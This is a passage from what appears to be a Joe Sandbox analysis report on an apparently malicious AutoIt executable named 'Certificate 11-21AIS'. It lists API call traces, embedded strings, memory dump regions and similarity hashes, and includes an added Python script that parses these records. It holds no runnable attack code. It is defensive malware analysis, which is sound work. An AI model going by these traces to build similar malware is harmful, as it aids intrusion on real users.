                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction ID: 4556f0c9707a6325bfc51f357280ae6f1e8074958933675b06cc3a487ae5c460
                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction Fuzzy Hash: DAC1A1322050A709DB2D4639943043EBBA1AAA17B571A077FD5B3CF6D7EE20D564E620
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                              • Instruction ID: 6aa98a7133bdb50eace3d402bee294d31df0e7fe41a5f0a54efc9a9e207b4154
                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                              • Instruction Fuzzy Hash: 4941C271D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                              • Instruction ID: 1b50f1c5bf5acb5135ae98cf7a90f44bdff16d29cbbcca0d487987b0f5c6c59f
                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                              • Instruction Fuzzy Hash: 71019278A01109EFCB49DF98C5909AEF7B5FB88310F208599E819A7341E730AE41DB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                              • Instruction ID: 31c3cccc1a78a83af18b466f20933e506993c9f2064057e01b4e455645daa9b4
                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                              • Instruction Fuzzy Hash: 6601A478A01109EFCB49DF98C5909AEF7F5FF98310F608599D819A7342E730AE41DB80
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 0091A2FE
                                                                              • DeleteObject.GDI32(00000000), ref: 0091A310
                                                                              • DestroyWindow.USER32 ref: 0091A31E
                                                                              • GetDesktopWindow.USER32 ref: 0091A338
                                                                              • GetWindowRect.USER32(00000000), ref: 0091A33F
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0091A480
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0091A490
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A4D8
                                                                              • GetClientRect.USER32(00000000,?), ref: 0091A4E4
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0091A51E
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A540
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A553
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A55E
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0091A567
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A576
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0091A57F
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A586
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0091A591
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A5A3
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0094D9BC,00000000), ref: 0091A5B9
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0091A5C9
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0091A5EF
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0091A60E
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A630
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A81D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 3b6621f9df010e3328006cc8d06d9542a41a33afce3231635fc519c6bc972b55
                                                                              • Instruction ID: 35ce79879d87d7edb4c4809213e5e342a21042b45d3b083a1faeff2b444307d3
                                                                              • Opcode Fuzzy Hash: 3b6621f9df010e3328006cc8d06d9542a41a33afce3231635fc519c6bc972b55
                                                                              • Instruction Fuzzy Hash: 62028F79A11208EFDB14DFA8CD89EAE7BB9FB49310F108158F9159B2A0C770ED41DB61
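                                                                              The function records above are useful in bulk only if they can be tied back to the memory region each function was carved from: the dumps at 008C0000 are PE-backed (the AutoIt interpreter image), while the 011B2000 dump is not ("based on PE: false"), and its file name carries different protection and type fields. The following Python script is an added example, not Joe Sandbox code: it parses records in the layout shown on this page (the "APIs", "Memory Dump Source" and "Similarity" blocks, including the "Part of subcall function" lines and the "Download File" link text the report UI appends to each Associated entry) and decodes the dotted .sdmp name. The decoding rests on an assumption, stated in the code, that the fifth field is the region's page protection and the seventh its memory type as winnt.h constants; that reading agrees with the "based on PE" flags on this page (0x20 with MEM_IMAGE for the code section, 0x40 with MEM_PRIVATE for 011B2000) but is not documented by the vendor, and the two remaining fields are returned raw. The sample input is a trimmed copy of two records from this page.

```python
"""Parse the per-function records of a Joe Sandbox Windows Analysis Report
(the 'APIs', 'Memory Dump Source' and 'Similarity' blocks) and decode the
.sdmp dump-file name so each function hash can be tied to the memory region
it was carved from. Added example; not Joe Sandbox code."""
import re
from typing import Dict, List

# winnt.h memory constants used to decode the dump-file name fields.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMPTION: field 5 of the dotted name is the region's page protection and
# field 7 its MEMORY_BASIC_INFORMATION.Type. That reading fits the values on
# this page (0x20 + MEM_IMAGE for the PE code section, 0x40 + MEM_PRIVATE for
# the non-PE 011B2000 region) but is not documented by Joe Sandbox; fields 6
# and 8 are returned raw because their meaning is unknown.
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ts>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<f5>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})"
    r"\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$")
# One 'APIs' line: optional "Part of subcall function X: " prefix, Name.Module,
# optional "(args)" and " ref: <address>" (DestroyWindow.USER32 has no parens).
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SCALAR = {"Snapshot File": "snapshot", "API ID": "api_id", "String ID": "string_id",
          "API String ID": "api_string_id", "Opcode ID": "opcode_id",
          "Instruction ID": "instruction_id", "Opcode Fuzzy Hash": "opcode_fuzzy",
          "Instruction Fuzzy Hash": "instruction_fuzzy"}


def decode_sdmp_name(name: str) -> Dict:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    protect, mtype = int(m["f5"], 16), int(m["f7"], 16)
    return {"pid": int(m["pid"], 16), "dump_index": int(m["dump"], 16),
            "timestamp": int(m["ts"]), "base": int(m["base"], 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "type": MEM_TYPE.get(mtype, hex(mtype)), "raw_f6": m["f6"], "raw_f8": m["f8"],
            # RWX private memory that is not an image mapping is the usual home
            # of an unpacked stage, so flag it for the analyst.
            "rwx_private": protect == 0x40 and mtype == 0x20000}


def _new_record() -> Dict:
    return {"apis": [], "associated": [], "source_file": None, "offset": None, "based_on_pe": None}


def parse_records(text: str) -> List[Dict]:
    """One dict per function; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, rec = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        key, _, val = line.partition(":")
        val = val.strip()
        if key == "Source File":
            parts = [p.strip() for p in val.split(",")]
            rec["source_file"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                if k == "Offset":
                    rec["offset"] = int(v.strip(), 16)
                elif k == "based on PE":
                    rec["based_on_pe"] = v.strip().lower() == "true"
        elif key == "Associated":
            # the report UI appends a "Download File" link label to every entry
            rec["associated"].append(val.replace("Download File", "").strip())
        elif key in SCALAR:
            rec[SCALAR[key]] = val
            if key == "Instruction Fuzzy Hash":
                records.append(rec)
                rec = _new_record()
        elif (m := API_RE.match(line)):
            rec["apis"].append(m.groupdict())
    return records


def functions_calling(records: List[Dict], api_name: str) -> List[Dict]:
    """Records whose resolved API list (not the API ID digest) names api_name."""
    return [r for r in records if any(a["name"] == api_name for a in r["apis"])]


def region_summary(records: List[Dict]) -> Dict[str, Dict]:
    """Decoded region info plus function count, keyed by source dump name."""
    out: Dict[str, Dict] = {}
    for r in records:
        if r["source_file"]:
            info = out.setdefault(r["source_file"],
                                  {**decode_sdmp_name(r["source_file"]), "functions": 0})
            info["functions"] += 1
    return out


# Constructed sample: a trimmed copy of two records shown on this page.
SAMPLE = """\
APIs
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A4D8
• DestroyWindow.USER32 ref: 0091A31E
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0094D9BC,00000000), ref: 0091A5B9
  • Part of subcall function 0092D575: GetSysColor.USER32(00000012), ref: 0092D5AE
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• Instruction Fuzzy Hash: 62028F79A11208EFDB14DFA8CD89EAE7BB9FB49310F108158F9159B2A0C770ED41DB61
Memory Dump Source
• Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
• API ID:
• Instruction Fuzzy Hash: 4941C271D1051CEBDF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
"""
```

                                                                              Run over the full report text rather than the sample, `region_summary` gives one row per dump with its decoded protection and type, and `functions_calling` (matching on the resolved API list rather than the sorted "API ID" digest) picks out, for example, every function that reaches OleLoadPicture or SendMessageW. Under the stated assumption the 011B2000 dump decodes as PAGE_EXECUTE_READWRITE, MEM_PRIVATE and non-PE, which is the region an analyst should carve and inspect first; the 008C1000 dump decodes as PAGE_EXECUTE_READ inside a MEM_IMAGE mapping, consistent with the report's "based on PE: true".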
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0092D2DB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0092D30C
                                                                              • GetSysColor.USER32(0000000F), ref: 0092D318
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0092D332
                                                                              • SelectObject.GDI32(?,00000000), ref: 0092D341
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0092D36C
                                                                              • GetSysColor.USER32(00000010), ref: 0092D374
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0092D37B
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0092D38A
                                                                              • DeleteObject.GDI32(00000000), ref: 0092D391
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0092D3DC
                                                                              • FillRect.USER32(?,?,00000000), ref: 0092D40E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0092D439
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(00000012), ref: 0092D5AE
                                                                                • Part of subcall function 0092D575: SetTextColor.GDI32(?,?), ref: 0092D5B2
                                                                                • Part of subcall function 0092D575: GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(0000000F), ref: 0092D5D3
                                                                                • Part of subcall function 0092D575: GetSysColor.USER32(00000011), ref: 0092D5F0
                                                                                • Part of subcall function 0092D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
                                                                                • Part of subcall function 0092D575: SelectObject.GDI32(?,00000000), ref: 0092D60F
                                                                                • Part of subcall function 0092D575: SetBkColor.GDI32(?,00000000), ref: 0092D618
                                                                                • Part of subcall function 0092D575: SelectObject.GDI32(?,?), ref: 0092D625
                                                                                • Part of subcall function 0092D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
                                                                                • Part of subcall function 0092D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
                                                                                • Part of subcall function 0092D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
                                                                                • Part of subcall function 0092D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                              • Instruction ID: 5a768c1b9735b0c4f7a0114792d6bc922872a55520ff9fbdb5e34048b300f1cf
                                                                              • Opcode Fuzzy Hash: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
                                                                              • Instruction Fuzzy Hash: 2A91B17940E311BFD7109F64DC08E6B7BA9FF8A325F100A19F962961E4C730D944DB92
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 008DB98B
                                                                              • DeleteObject.GDI32(00000000), ref: 008DB9CD
                                                                              • DeleteObject.GDI32(00000000), ref: 008DB9D8
                                                                              • DestroyIcon.USER32(00000000), ref: 008DB9E3
                                                                              • DestroyWindow.USER32(00000000), ref: 008DB9EE
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0093D2AA
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0093D2E3
                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0093D711
                                                                                • Part of subcall function 008DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008DB759,?,00000000,?,?,?,?,008DB72B,00000000,?), ref: 008DBA58
                                                                              • SendMessageW.USER32 ref: 0093D758
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0093D76F
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0093D785
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0093D790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 0b72c6d93b9c757f1ff579effe0dc69df5153a392f1095ba42a0fd354eee1ca4
                                                                              • Instruction ID: 6ce97e49d977d713bb3dc980ebaab7d50de371283ea8c90beea8bbfa0d9152a5
                                                                              • Opcode Fuzzy Hash: 0b72c6d93b9c757f1ff579effe0dc69df5153a392f1095ba42a0fd354eee1ca4
                                                                              • Instruction Fuzzy Hash: A7128B74206241EFDB10CF28D8A4BA9BBA9FF05318F14456AF999CB262C731EC45DF91
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090DBD6
                                                                              • GetDriveTypeW.KERNEL32(?,0095DC54,?,\\.\,0095DC00), ref: 0090DCC3
                                                                              • SetErrorMode.KERNEL32(00000000,0095DC54,?,\\.\,0095DC00), ref: 0090DE29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: af32e4ca3601efc013ce5af43fe44658a1b79d21b6d84f464680a88df7479219
                                                                              • Instruction ID: 7485f7b00f35af248a10536072d14bdbed317d10ec8401cb6f6f9f04732c14f2
                                                                              • Opcode Fuzzy Hash: af32e4ca3601efc013ce5af43fe44658a1b79d21b6d84f464680a88df7479219
                                                                              • Instruction Fuzzy Hash: 22518E31249302AFC610EBA4C882D39B7A4FBD4709B24C91AF48BDB6D1DB70D945EB42
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: a98d5c04ad8755e749be56becb571c9f28d7a01e7575d7b56c5478b0147557be
                                                                              • Instruction ID: 671997ac0dd18717ca96ec3097b6509983679ad626fa04e8d6e1e9bb42c6d8cd
                                                                              • Opcode Fuzzy Hash: a98d5c04ad8755e749be56becb571c9f28d7a01e7575d7b56c5478b0147557be
                                                                              • Instruction Fuzzy Hash: B781C471640219AACB25AB69DC83FBA3778FF55704F04403DF90AEA1C2EB70D945C792
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0095DC00), ref: 00926449
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 3964851224-45149045
                                                                              • Opcode ID: ccb6bf52184528f48d05745d648359a3f9ff0c7c3c38c4d7fc234d3fddd1d7a3
                                                                              • Instruction ID: 1dd8a2679bed7883d20ef5a0d306e94d779f6cad946d44ec09599798530f929e
                                                                              • Opcode Fuzzy Hash: ccb6bf52184528f48d05745d648359a3f9ff0c7c3c38c4d7fc234d3fddd1d7a3
                                                                              • Instruction Fuzzy Hash: 77C18F302143558BCA04EF28D551A6E77E9FF94344F108969F8869B7A7DB34ED0ACB83
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 0092D5AE
                                                                              • SetTextColor.GDI32(?,?), ref: 0092D5B2
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
                                                                              • GetSysColor.USER32(0000000F), ref: 0092D5D3
                                                                              • CreateSolidBrush.GDI32(?), ref: 0092D5D8
                                                                              • GetSysColor.USER32(00000011), ref: 0092D5F0
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
                                                                              • SelectObject.GDI32(?,00000000), ref: 0092D60F
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0092D618
                                                                              • SelectObject.GDI32(?,?), ref: 0092D625
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0092D6BF
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0092D6DD
                                                                              • DrawFocusRect.USER32(?,?), ref: 0092D6E8
                                                                              • GetSysColor.USER32(00000011), ref: 0092D6F6
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0092D6FE
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0092D712
                                                                              • SelectObject.GDI32(?,0092D2A5), ref: 0092D729
                                                                              • DeleteObject.GDI32(?), ref: 0092D734
                                                                              • SelectObject.GDI32(?,?), ref: 0092D73A
                                                                              • DeleteObject.GDI32(?), ref: 0092D73F
                                                                              • SetTextColor.GDI32(?,?), ref: 0092D745
                                                                              • SetBkColor.GDI32(?,?), ref: 0092D74F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
